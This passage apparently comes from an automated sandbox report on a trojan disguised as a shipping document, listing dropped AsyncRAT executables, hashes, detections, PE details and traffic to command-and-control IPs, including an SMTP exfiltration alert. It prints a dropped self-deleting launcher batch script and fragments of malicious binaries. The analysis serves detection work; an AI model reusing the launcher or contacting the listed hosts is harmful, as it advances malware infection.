                                                                                                                    • Antivirus: ReversingLabs, Detection: 94%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                                                                                                    C:\Users\user\AppData\Local\Temp\Isgeprf.exe
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):46080
                                                                                                                    Entropy (8bit):5.460481307882583
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:HuOe1TXQpMlWUlr7e+fmo2qDWL5P0NFUTpYkk8PIvzjbpgX3iQ2/bcGA8+gulCsN:HuOe1TXOw2BLs7Bv3bmXSQk9/Wdjx
                                                                                                                    MD5:E2DA4F42475E01F7961EF2FB929DE54E
                                                                                                                    SHA1:E57DF765DA7135D578B29E4619CC395A729EB757
                                                                                                                    SHA-256:488C59FDDF2DB00DA7FB4D6589183ADC7396EDC4233F23EB950AA7191FE4366E
                                                                                                                    SHA-512:08CF988BE2B1D4214812477759BF273E1281D762491D5EB40ED77C95AD701A08FCE0D5A67B7D2163389E0EFA96422DD535D1062ECB345AC6054688E38EB6E2A0
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................>.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........Y...l.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...
                                                                                                                    C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
                                                                                                                    Process:C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):128000
                                                                                                                    Entropy (8bit):7.95381804390952
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:DJyVj8p64ZCYke3DIgu2hXNGAAYDqREUJmnlq722EP3mThUP2P:M4pi5e3Mg7XsAXlU8l3tPU
                                                                                                                    MD5:01475371C9519A0C8F64B7606A0833E0
                                                                                                                    SHA1:58DE8246D2910F00ED1D4DEABC69CF60D8DDCF8B
                                                                                                                    SHA-256:97A5CAB2336F3B81F82D7EC85B2F0937CE39D10E512BF0BDADE9248D6D1BC682
                                                                                                                    SHA-512:9DB9F3D2F6DB0E1E7154D79B54316A0A54D75BDAB327EC248D23F7EED3DB54BB00C61C003C92E1B1C38D30EEFA6A680CBA73B7CF28DE3C2181BB82B25E40662F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._................................. ... ....@.. .......................`............@.................................t...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........................"..0...........................................Z(.....(....s....(....*z.,..{....,..{....o......(....*..s....}......(.....r...po............s....(....*6.(.....(....*....0..W.......(....r...p(.......(....(....(.....(....&(....r%..p(.......(....(....(.....(....&.( ...*..0..X........s!......$........o"...&..(#......s$......$..........o"...&.......,..o......,..o.......*......(..A..........DK........((...*.0..2.......~........., rE..p.....()...o*...s+......
                                                                                                                    C:\Users\user\AppData\Local\Temp\VLC2.exe
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Isgeprf.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):46080
                                                                                                                    Entropy (8bit):5.460481307882583
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:HuOe1TXQpMlWUlr7e+fmo2qDWL5P0NFUTpYkk8PIvzjbpgX3iQ2/bcGA8+gulCsN:HuOe1TXOw2BLs7Bv3bmXSQk9/Wdjx
                                                                                                                    MD5:E2DA4F42475E01F7961EF2FB929DE54E
                                                                                                                    SHA1:E57DF765DA7135D578B29E4619CC395A729EB757
                                                                                                                    SHA-256:488C59FDDF2DB00DA7FB4D6589183ADC7396EDC4233F23EB950AA7191FE4366E
                                                                                                                    SHA-512:08CF988BE2B1D4214812477759BF273E1281D762491D5EB40ED77C95AD701A08FCE0D5A67B7D2163389E0EFA96422DD535D1062ECB345AC6054688E38EB6E2A0
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\VLC2.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................>.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........Y...l.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Isgeprf.exe
                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):150
                                                                                                                    Entropy (8bit):5.043804988414281
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:mKDDCMNqTtvL5oWXp5cViE2J5xAIddiovmqRDWXp5cViE2J5xAInTRIOVRLazVZ6:hWKqTtT6WXp+N23ffLvmq1WXp+N23fT9
                                                                                                                    MD5:388EB945DAD3F52CC1817A1F7A40D910
                                                                                                                    SHA1:F71A000719329DF48C5672DB1B4DB87C61CF6CCA
                                                                                                                    SHA-256:6C6808B0EAE57E429BB83B08AC62823A80BBC699D203C8B07798AE1C3E1CC11E
                                                                                                                    SHA-512:B21A73C4BBE96E9957DA9EA029446B6FA8664CAAFD776587B4E08C7BD595C8228D593B24395DEA2C2EA9895D78F87F69AEF029400A34F39BD3886B94FC962B17
                                                                                                                    Malicious:false
                                                                                                                    Preview: @echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Local\Temp\VLC2.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpA04.tmp.bat" /f /q..
                                                                                                                    C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Icda.exe
                                                                                                                    File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8
                                                                                                                    Entropy (8bit):3.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:RaD:I
                                                                                                                    MD5:01962885EF8F2FE70BB19B7042C8445C
                                                                                                                    SHA1:1576FDFFCDE15A2C54BDF910C8ED8247E4B733FC
                                                                                                                    SHA-256:C5400085BB865B92096703DF51D7688EEBC03DF6103E70C8C57520FC020BA348
                                                                                                                    SHA-512:36A81CE9C4B31BA31249AAB23AE18DD38A078C435DAFF2CB378B063246237F32E45072C6DF48387A63C2ECF8890A9B0CE4F32011720E814BB19D352690BC263B
                                                                                                                    Malicious:true
                                                                                                                    Preview: .5=?...H
                                                                                                                    \Device\Null
                                                                                                                    Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.41440934524794
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                                    Malicious:false
                                                                                                                    Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Entropy (8bit):7.717996960469375
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                    File name:Consignment Document PL&BL Draft.exe
                                                                                                                    File size:700416
                                                                                                                    MD5:b70ffeb2babbacb28b22411beccb4642
                                                                                                                    SHA1:3c096e92894c9ff7bfae0fcc0ce5f250cb4ebe9f
                                                                                                                    SHA256:623d707cab5c5dc378a5100018e29f88949f4ea4be4b34cc2fc36e1612b68100
                                                                                                                    SHA512:79471594362dcb6f5ecbddb34ce68ddbbfc2320fa088439a54a0dfba7c878d32e5715366808b7a7399f33c9b992e6ebac75d90d9cdc5d591b42e480f4874db41
                                                                                                                    SSDEEP:12288:C2HV0CAO/8tsaZm/VGGNO332QplXGJi2o3TnCaR:C2HYBVm/MGillXe3szCa
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x._..............0.............B<... ...@....@.. ....................................@................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:e0f4f4dcd8dcccf0

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x493c42
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                    Time Stamp:0x5FC87881 [Thu Dec 3 05:32:49 2020 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x93bf00x4f.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x18c2c.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x20000x91c480x91e00False0.896303623072data7.86672838882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x940000x18c2c0x18e00False0.321823963568data5.63415026876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0xae0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                    RT_ICON0x941f00x468GLS_BINARY_LSB_FIRST
                                                                                                                    RT_ICON0x946580x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                                                                    RT_ICON0x988800x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 967405405, next used block 141717609
                                                                                                                    RT_ICON0x999280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                                                                    RT_ICON0x9bed00x10828dBase III DBT, version number 0, next free block index 40
                                                                                                                    RT_GROUP_ICON0xac6f80x4cdata
                                                                                                                    RT_VERSION0xac7440x2fcdata
                                                                                                                    RT_MANIFEST0xaca400x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                    Version Infos

                                                                                                                    DescriptionData
                                                                                                                    Translation0x0000 0x04b0
                                                                                                                    LegalCopyright
                                                                                                                    Assembly Version2.0.0.0
                                                                                                                    InternalNamep.exe
                                                                                                                    FileVersion2.0.0.0
                                                                                                                    CompanyNameMicrosoft
                                                                                                                    LegalTrademarks
                                                                                                                    Comments
                                                                                                                    ProductNamePet Pamonha
                                                                                                                    ProductVersion2.0.0.0
                                                                                                                    FileDescriptionPet Pamonha
                                                                                                                    OriginalFilenamep.exe

                                                                                                                    Network Behavior

                                                                                                                    Snort IDS Alerts

                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                    12/03/20-09:32:57.327796TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49739587192.168.2.385.187.154.178

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 3, 2020 09:31:21.121231079 CET497095550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:24.159626961 CET497095550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:30.269514084 CET497095550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:37.690541029 CET497155500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:40.723503113 CET497155500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:42.994376898 CET497165550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:45.995290041 CET497165550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:46.724054098 CET497155500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:31:52.005683899 CET497165550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:01.321712971 CET497195550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:04.074192047 CET497205500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:04.334855080 CET497195550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:07.085100889 CET497205500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:10.335376024 CET497195550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:13.101190090 CET497205500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:18.594408035 CET497295550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:21.602077007 CET497295550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:27.618124008 CET497295550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:30.448883057 CET497315500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:33.462311983 CET497315500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:35.880191088 CET497325550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:38.884655952 CET497325550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:39.462771893 CET497315500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:44.900799990 CET497325550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:55.008579016 CET497375550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:56.842206955 CET497385500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:56.865803003 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:56.902061939 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:56.902169943 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.059776068 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.060077906 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.096456051 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.097995996 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.134474993 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.136959076 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.178388119 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.203146935 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.239535093 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.239850998 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.287650108 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.287950993 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.324184895 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.324232101 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.327795982 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.328111887 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.328252077 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.328385115 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:57.364470005 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.364510059 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.367136002 CET5874973985.187.154.178192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:57.417382002 CET49739587192.168.2.385.187.154.178
                                                                                                                    Dec 3, 2020 09:32:58.011385918 CET497375550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:32:59.855140924 CET497385500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:33:04.027350903 CET497375550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:33:05.855571032 CET497385500192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:33:12.319056988 CET497405550192.168.2.3172.94.25.202
                                                                                                                    Dec 3, 2020 09:33:15.325206041 CET497405550192.168.2.3172.94.25.202

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 3, 2020 09:31:19.367966890 CET5754453192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:19.395359039 CET53575448.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:20.564963102 CET5598453192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:20.836836100 CET53559848.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:21.017959118 CET6418553192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:21.045104980 CET53641858.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:30.495255947 CET6511053192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:30.522387981 CET53651108.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:30.864052057 CET5836153192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:30.903857946 CET53583618.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:37.422287941 CET6349253192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:37.681651115 CET53634928.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:42.682965994 CET6083153192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:42.943188906 CET53608318.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:52.311958075 CET6010053192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:52.338975906 CET53601008.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:31:52.817423105 CET5319553192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:31:52.860649109 CET53531958.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:01.058284998 CET5014153192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:01.317799091 CET53501418.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:03.798532009 CET5302353192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:04.072484016 CET53530238.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:05.174170971 CET4956353192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:05.201227903 CET53495638.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:09.620980024 CET5135253192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:09.666882038 CET53513528.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:18.332866907 CET5934953192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:18.592967987 CET53593498.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:22.460119963 CET5708453192.168.2.38.8.8.8
                                                                                                                    Dec 3, 2020 09:32:22.487194061 CET53570848.8.8.8192.168.2.3
                                                                                                                    Dec 3, 2020 09:32:30.188091040 CET5882353192.168.2.38.8.8.8
